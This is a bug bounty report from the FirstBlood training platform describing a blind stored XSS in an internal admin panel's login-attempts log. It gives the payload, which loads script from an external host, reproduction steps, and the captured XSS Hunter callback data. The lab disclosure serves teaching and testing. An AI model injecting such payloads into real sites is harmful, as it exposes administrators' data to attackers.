FirstBlood-#1319Blind xss on FirstBloodHackers INTERNAL ADMIN PANEL
This issue was discovered on FirstBlood v3



On 2022-12-09, didsec Level 5 reported:

Hi there

I found that the internal admin page is vulnerable to a blind xss via login attempts on login.php

Payload

"><script src="https://xss.hunter"></script>

To reproduce :

  1. Go to the login page
  2. Enter payload in the username and password fields
  3. Click login

impact

An attacker is able to access critical information from the admin panel.

XSS Hunter report below

URL

The URL of the page the payload fired on.

`https://firstblood-helper.com/login_attempts.php?id=683`

---

IP Address

Remote IP address of the victim.

`86.145.182.70`

---

Referer

Referring page for the vulnerable page.

`https://firstblood-helper.com/login_attempts.php`

---

User-Agent

Web browser of the victim.

`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`

---

Cookies

Non-HTTPOnly cookies of the victim.

_None_

---

Title

Vulnerable page's title.

`FirstBloodHackers INTERNAL ADMIN PANEL`

---

DOM/HTML

Rendered DOM of the vulnerable page.

#### Page HTML too large to display inline, please use one of the options below.

---

Text

Text of the vulnerable page.

1

Logged in as

2

ADMINISTRATOR-SEAN

3

​

4

Home

5

​

6

Login Attempts

7

​

8

INTERNAL USE ONLY

9

Managing FirstBlood Login Attempts

10

The login attempt below was flagged as being potentially malicious.

11

ID  Username  Date  Actions

12

683 ">

---

Origin

HTTP origin of the vulnerable page.

`https://firstblood-helper.com`

---

Browser Time

Reported time according to the victim's browser.

`Friday, December 9th 2022, 10:38:55 am (_1670582335223_)`

---

Other

Other miscellaneous information.

Fired in iFrame?: `false`

Vulnerability enumerated `Friday, December 9th 2022, 10:38:57 am`

Report ID: `11b4d0bb-58d4-4a76-be70-8431fe4be1e0`

P1 CRITICAL


FirstBlood ID: 72
Vulnerability Type: Stored XSS

Login attempts were logged on an internal panel on firstblood-helper.com and the username is vulnerable to blind XSS affecting FirstBlood staff

Report Feedback

@zseano

Creator & Administrator


CONGRATULATIONS, you were the first user to discover this bug based on login IDs. (although you were NOT the first to report it, I have concerns that some users modified earlier reports). You have won yourself a LIMITED edition BugBountyHunter HAT and a bounty. WELL DONE!!!